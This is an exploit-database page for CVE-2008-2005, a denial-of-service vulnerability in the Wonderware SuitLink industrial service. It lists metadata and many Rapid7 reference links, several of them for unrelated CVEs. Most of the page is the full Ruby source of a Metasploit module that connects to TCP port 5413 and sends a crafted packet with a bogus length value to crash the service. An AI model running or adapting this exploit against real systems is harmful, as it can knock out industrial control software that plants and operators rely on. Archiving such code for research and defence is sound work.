header-logo
Suggest Exploit
vendor:
SuitLink
by:
belay tows
7.5
CVSS
HIGH
DoS
16
CWE
Product Name: SuitLink
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2008-2005
CPE: None
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0602/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-5302/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-5302/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-5302/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0013-cve-2008-5302/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0013-cve-2008-5303/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-700-1/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-5303/https://www.rapid7.com/db/vulnerabilities/apple-osx-perl-cve-2008-5302/https://www.rapid7.com/db/vulnerabilities/apple-osx-perl-cve-2008-5303/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-5303/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-4690/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-4690/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2008-0965/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-4690/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0630/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-2933/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-2933/https://www.rapid7.com/db/vulnerabilities/mfsa2008-35-cve-2008-2933/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-2933/https://www.rapid7.com/db/?q=CVE-2008-2005&type=&page=2https://www.rapid7.com/db/?q=CVE-2008-2005&type=&page=2
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Wonderware SuitLink Denial of Service

This module exploits a denial of service vulnerability within the SuitLink service in Wonderware products.

Mitigation:

No known mitigation or remediation for this vulnerability
Source

Exploit-DB raw data:

##
# $Id: suitlink.rb $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Auxiliary::Dos::Windows::Wonderware::SuitLink < Msf::Auxiliary

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Wonderware SuitLink Denial of Service',
			'Description'    => %q{
				This module exploits a denial of service vulnerability
				within the SuitLink service in Wonderware products.
			},
			'Author'         => [ 'belay tows' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1 $',
			'References'     =>
				[
					[ 'BID', '28974' ],
					[ 'CVE', '2008-2005' ],
				],
			'DisclosureDate' => 'May 05 2008'))
			
			register_options([Opt::RPORT(5413),], self.class)
	end

	def run
		connect

		print_status("Sending DoS packet...")

        dos_length = 0xBAADF00D

		pkt =  "\xD5\xCF\xC7\xF8\x0B\xCD\xD3\x11\xAA\x10\x00\xA0\xC9\xEC\xFD\x9F"
		pkt << Rex::Text.rand_text_alpha(0x14) + "\x00\x00"
        pkt << [dos_length].pack("V")
	
        len = [pkt.length].pack("C")
		sock.put(len)
		
		sock.put(pkt)

        sleep 15 # wait to avoid thread shutdown event
		
		disconnect
	end

end
end	

# milw0rm.com [2008-09-17]

Navigation

Suggest Exploit

Services By CQR